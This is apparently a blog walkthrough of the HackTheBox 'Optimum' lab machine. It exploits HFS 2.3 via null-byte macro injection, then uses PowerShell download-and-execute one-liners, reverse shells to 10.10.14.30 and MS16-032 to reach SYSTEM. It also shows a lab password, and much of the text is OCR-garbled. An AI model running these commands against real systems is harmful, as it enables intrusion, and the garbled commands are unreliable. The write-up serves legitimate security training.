Optimum – No Metasploit

walkthroughs 2 Minutes

Lets power up nmap and see what we find:

PORT STATE SERVICE REASON VERSION 8Ø/tcp open http syn-ack ttI 127 HttpFiIeServer httpd 2.3 l_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1 I http-methods: I _ Supported Methods: GET HEAD POST _http-server-header: HFS 2.3 l_http-title: HFS / Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 20121712008120161vista (91%) OS CPE: cpe:/o:microsoft:windows_server_2ø12 cpe:/o:microsoft:windows_7: cpe:/o:microsoft:windows_server_2øø8:r2 cpe:/o:microsoft:windows_8 cpe:/o:micr t:windows vista: :- cpe: :spl OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Mic osoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SPI or Windows 8 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 Professional or or Windows Server 2008 SP2 or 2008 R2 SPI (85%), Microsoft Windows Vista SPO or SPI, Windows Server 2008 SPI, or Windows 7 (85%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: 686-pc-linux-gnu) OPS(OI

Okay. Let’s go to 10.10.10.8

@ 10.10.10.8 Most Visited Offensive Security Kali Tools •S Exploit-DB OS user Login No files in this folder D Folder O folders, O files, O bytes -72090 Student co... Offensive Security For... Q Search Inbox - adeebhshah@g... Finding Bad Character... Search Select go Invert Mask O items selected Actions Archive Get list Server information HttpFileServer2.3 sep.'er time: 3/6/2020 Server uptime: 10:37:37

Look at the bottom left. We get HttpFileServer 2.3

Let’s poke around on SearchSploit:

searchsploit hfs Exploit Title TRUNCATE Denial of Ser Apple Mac OSX 10.4.8 - NIG kFS+ DO _ LRFS FileSystem (Denial of Service) Apple Mac OSX 10.6 - Subsystem Information Disclosure Apple Mac OSX 10.6.x - BFS Apple Mac OSX xnu 1228. x - 'hCs-fcntI' Kernel Privilege Escal FHES - FTP/HTTP File Server 2.1.2 Remote Command Execution Linux Kernel Double-Free Denial of Service 2 6 x SquashF Rejetto Rejetto Rejetto Rejetto Rejetto Rejetto HTTP HTTP HTTP HTTP HTTP HTTP File File File File File File Server Server Server Server Server Server (kFS) Remote Command Execution (Me 1.5/2. x - Multiple Vulnerabili 2.2/2.3 - Arbitrary File Uploa 2.3.x - Remote Command Executi 2.3.x - Remote Command Executi 2.3a/2.3b/2.3c - Remote Comman Path (/usr/share/exploi tdb/) exploi ts/osx/dos/29454. txt exploits/osx/dos/12375. c exploi ts/osx/IocaI/35488. c exploits/osx/IocaI/8266. txt exploi ts (windows / remote/ 37985 . py exploits/Iinux/dos/28895. txt expl oi ts/windows / remote/ 34926. rb exploi ts/windows/remote/31Ø56. py exploits/mu1tip1e/remote/3Ø850. txt exploi ts (windows / remote/ 34668. txt exploi ts/windows/remote/39161. py expl oi ts/windows /webapps/34852. txt

RCE always looks fun. Let’s look at that one… specifically the .txt file:

issue exists due to a poor regex in the file ParserLib.pas function findMacroMarker(s:string; begin result: , ofs) end; it will not handle null byte so a request to http://localhost : . exec I cmd . } will stop regex from parse macro , and macro will be executed and remote code injection happen . EDB Note: This vulnerability will run the payload multiple times simultaneously. Make sure to take this into consideration when crafting your payload (and/or listener).

So basically we need to apply a null byte and then {.exec|cmd.} where cmd is whatever command we want. Let’s use burp to try this out. It took me a while to figure this out and I actually had to watch Ippsec’s video but in it he explains the importance of SysNative vs. SysWow64 vs System32.

And in our icmp dump we get:

20:58:30. 657617 657649 703055 703087 706503 706526 707674 20:58:30. 707698 . 674435 . 674469 •58:31.721354 721401 20:58:31. 721416 20:58:31. 721419 20:58:31. 721496 20:58:31. 721501 690808 20:58:32. 690842 20:58:32. 736639 20:58:32. 736673 20:58:32. 736686 20:58:32. 736688 20:58:32. 736694 20:58:32. 736696 20:58:33. 706481 20:58:33. 706515 752505 20:58:33. 752539 20:58:33. 752550 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 > hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 > hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10. 10.8 hyd3: ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id 1, seq 37, length seq 37, length 1, seq 38, length seq 38, length 1, seq 39, length seq 39, length 1, seq length seq length 1, seq 41, length seq 41, length 1, seq 42, length seq 42, length 1, seq 43, length seq 43, length 1, seq length seq length 1, seq 45, length seq 45, length 1, seq 46, length seq 46, length 1, seq 47, length seq 47, length 1, seq 48, length seq 48, length 1, seq 49, length seq 49, length 1, seq 50, length seq 50, length 1, seq 51, length

So we have command execution! Now, let’s copy Invoke-PowerShellTCP.ps1 to working our directory and append the file with the example in the PS1 script

$client .C10se() if ($listener) $1istener .stop( ) catch Write-warning rrect port." Write-Error $_ "Something went wrong! Check if the server is reachable and you are using the co Invoke-PowerShe11Tcp -Reverse -IPAddress 10.10.14.30 -Port

Serve it up on our box:

- [27/May/2Ø2Ø 110.10.10.8 .8 - - [27/May/2Ø2Ø 10.10. 10 "10.10.10 .8 - - [27/May/2Ø2Ø .8 - - [27/May/2Ø2Ø 10.10.10 8 - - [27/May/2Ø2Ø "10.10.10. .8 - - [27/May/202ø kaliö)hyd3 . "Documents/htb/optimum$ sudo python -m http.server 80 Serving HTTP on ø.ø.ø.ø port 80 (http• .//ø.ø.ø.ø:80/) . HTTP/I.I" 200 HTTP/I.I" 200 HTTP/I.I" 200 HTTP/I.I" 200 HTTP/I.I" 200 HTTP/I.I" 200 17:22:31] 17:22:31] 17:22:31] 17:22:32] 20:53:51] 20:53:51] "GET "GET "GET "GET "GET "GET / Invoke-PowerShe11Tcp. PSI / Invoke-PowerShe11Tcp. PSI / Invoke-PowerSheIITcp. PSI / Invoke-PowerShe11Tcp. PSI / Invoke-PowerShe11Tcp. PSI / Invoke-PowerSheIITcp. PSI

Now let’s supply the correct argument to burp and remember to URL encode it. Don’t forget to set up your listener.

On our listener, we get a user shell:

Ikaliö)hyd3 . "Documents/htb/optimum$ rlwrap nc -nvlp listening on [any] connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49282 Windows PowerSheII running as user kostas on OPTIMUM Copyright (C) 2015 Microsoft Corporation. All rights reserved . PS C:

Looking around we get some creds that are pretty much useless at this point (but we keep enumerating anyway!)

DefaultDomainName DefaultUserName DefaultPassword Alt DefaultDomainName AltDefau1tUserName AI tDefau1 tPassword kostas kdeEjDowkS*

At this point, I ran sherlock.ps1 to help me out a bit.

kaliö)hyd3 . —/Documents/htb/optimum$ rlwrap nc -nvlp listening on [any] connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49295 Windows PowerShe11 running as user kostas on OPTIMUM Copyright (C) 2015 Microsoft Corporation. All rights reserved . PS http://1ø.1ø.14.3ø/winPEAS_64.exe -outfile winpeas64.exe PS C: IEX(New-Object Net 'http://1ø.1ø.14.3ø/Sher10ck.ps1') Title MSBu11etin CVEID ,Link VulnStatus Title MSBu11etin CVEID Link VulnStatus Title MSBu11etin CVEID Link VulnStatus Title MSBu11etin CVEID 'Link VulnStatus Title MSBu11etin •Link VulnStatus Title MSBu11etin CVEID Link VulnStatus User Mode to Ring (KiTrapøD) MS1ø-ø15 2010-0232 . https://www.exploit-db.com/exp10its/11199/ Not supported on 64-bit systems Task Scheduler . XML MS1ø-ø92 . 2010-3338, 2010-3888 . https://www.exploit-db.com/exp10its/1993ø/ Not Vulnerable NTUserMessageCaII Win32k Kernel Pool Overflow MS13-ø53 . 2013-1300 . https://www.exp10it-db.com/exp10its/33213/ Not supported on 64-bit systems TrackPopupMenuEx Win32k NULL Page MS13-ø81 . 2013-3881 . https://www.exp10it-db.com/exp10its/31576/ Not supported on 64-bit systems TrackPopupMenu Win32k Null Pointer Dereference MS14-ø58 . 2014-4113 . https://www.exploit-db.com/exp10its/351ø1/ Not Vulnerable ClientCopyImage Win32k MS15-ø51 . 2015-1701, 2015-2433 . https://www.exp10it-db.com/exp10its/37367/ Not Vulnerable

Hmm. At first I tried using an off-the-shelf MS16-032.ps1 script but they don’t work because they spawn a new terminal. We don’t have visual access so we can’t use it. Ippsec’s video shows us that there’s a copy in Empire that can be used on the CLI.

Testing it out:

PS C: Invoke-MS16-ø32 [by b33f öFuzzySec] Operating system core count: 2 Duplicating CreateProcessWithLogonW handle Done, using thread handle: 2472 Sniffing out privileged impersonation token.. Thread belongs to: svchost Thread suspended Wiping current impersonation token Building SYSTEM impersonation token Success, open SYSTEM token handle: 2468 Resuming thread.. Sniffing out SYSTEM shell.. Duplicating SYSTEM token Starting token race Starting process race Holy handle leak Batman, we have a SYSTEM shell! ! PS C: whoami optimum\kostas

So we can use this modified MS16-032 that accepts commands.

To use this you have to edit the bottom to run the function that you want with the specified argument as the script states:

Return $ca11Resu1t - - [Kerne132] : : Terminateprocess($processlnfo.hprocess, $Ca11Resu1t [Kerne132] : $Ca11Resu1t [Kerne132] : $StartTokenRace .stop( ) $SafeGuard .Stop( ) 1) Invoke-MS16032 -Command "iex(New-Object Net .WebC1ient) .DownIoadString( 'http://1Ø.1Ø.14.3Ø/rev4445.psQ' )"

Create another reverse tcp script with a different port (I called mine rev4445.ps1)

Running it:

PS C: Net .WebC1ient) .down10adString( 'http://1Ø.1Ø.14.3Ø/Invoke-MS 16032 .psl') [by b33f [!] Holy handle leak Batman, PS C: öFuzzySec] we have a SYSTEM shell!!

And on our other listener that we set up on port 4445, we get a NT AUTHORITY\SYSTEM shell:

kalih)hvd3: "Tools/AutoRecon/resuIts/1Ø.1Ø.1Ø.8/scans$ rlwrap nc listening on [any] connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49325 Windows PowerSheII running as user SYSTEM on OPTIMUM Copyright (C) 2015 Microsoft Corporation. All rights reserved . PS C: nt authority\system PS C: -nvlp 4445
Unknown's avatar

Published by hyd3sec

Published

Leave a comment